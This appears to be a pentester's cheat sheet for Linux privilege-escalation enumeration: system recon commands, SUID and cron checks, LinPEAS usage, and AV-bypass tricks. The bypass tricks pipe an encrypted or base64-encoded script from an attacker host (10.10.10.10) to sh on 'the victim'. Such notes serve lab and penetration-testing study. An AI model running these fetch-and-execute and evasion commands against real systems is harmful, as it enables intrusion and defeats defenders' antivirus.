Enumeration
id
hostname
env
cat .bashrc
cat /etc/passwd
cat /etc/issue
cat /etc/os-release
uname -a
ps aux # list all processes, with or without a tty, in a user-readable format.
ip a
routel / route # Get a list of the network routing tables.
netstat -punta / ss -ntpu # List open ports and the owning processes
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
crontab -l
sudo crontab -l
dpkg -l # List applications installed by dpkg
find / -writable -type d 2>/dev/null
cat /etc/fstab # List all drives that will be mounted at boot time.
mount # List all mounted file systems.
lsblk # List all available disks and partitions
find / -perm -u=s -type f 2>/dev/null # Find all SUID-marked binaries / might take a minute.
Automated Enumeration Checks
Kali Linux has a built-in script called unix-privesc-check.
./unix-privesc-check standard > output.txt
My favorite Linux check script is LinPEAS. Depending on the circumstances you might want to choose between the bash script and the binary.
# Fetch the script from GitHub and run it
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
They even offer some tips on performing rudimentary AV bypass. Always remember to tweak the password to end up with a different encrypted binary.
# OpenSSL encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAESencryption -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAESencryption | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim